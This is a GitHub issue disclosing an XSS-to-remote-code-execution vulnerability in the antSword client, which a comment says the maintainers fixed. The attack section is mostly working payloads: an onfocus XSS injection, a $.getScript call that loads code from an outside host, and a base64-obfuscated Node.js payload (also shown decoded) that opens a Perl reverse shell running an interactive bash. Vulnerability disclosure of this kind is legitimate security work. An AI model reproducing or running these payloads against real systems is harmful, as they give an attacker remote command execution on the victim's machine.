Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Report CVE RCE Vulnerability in antSword #150

Closed
zkaq opened this issue Apr 16, 2019 · 2 comments

Comments

3 participants
@zkaq
Copy link

commented Apr 16, 2019

1# Report CVE RCE Vulnerability in antSword

xss

The XSS in the classification directory has not been repaired, possibly because it is too weak and neglected by the authorities

Image text

The JS substitution is obviously used here, but the authorities forgot to filter the use of single quotes, so we can take advantage of it here

Image text

It uses the DHTMLX framework.

Image text

In the framework DHTMLXOOLBAR.JS file, we found the vulnerability at line 1775.

this.obj.innerHTML = "<input class='dhxtoolbar_input' type='text' style='width:"+this.obj.w+"px;'"+(data.value!=null?" value='"+data.value+"'":"")+">"; ```

The content will be output unchanged to value value='"+data.value+"'":"")+">"; Resulting in vulnerabilities in XSS.

Image text

0x03 ## Attack approach.

Building the oninput to trigger the XSS

Image text

Next ,we’ll building the payload to finished the SSJI(server side javascript inject).

In the end

POC: 'autofocus onfocus=alertxss;'

Payload: 'autofocus onfocus=$.getScript(unescape('http%3A%2f%2fxxx.in%2f2Yuo%0A'));' Image text

payload:

eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU 29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1 NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9 pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VU LCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJ ycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3 Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())

Decoding Base64 : require('child_process').exec('perl -e 'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotoby name("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN, ">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });

@ViCrack

This comment has been minimized.

Copy link

commented Apr 17, 2019

感觉防不胜防,是不是真要考虑所有从服务端获取到的数据时进行编码检查了,如果另外有二次编码处理的再做考虑?

@Medicean Medicean closed this in 94f56fc Apr 17, 2019

@Medicean Medicean added the 🐛Bug label Apr 17, 2019

@Medicean

This comment has been minimized.

Copy link
Collaborator

commented Apr 17, 2019

非常感谢指出。

@Medicean Medicean added this to Done in AntSword-v2.1 Apr 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.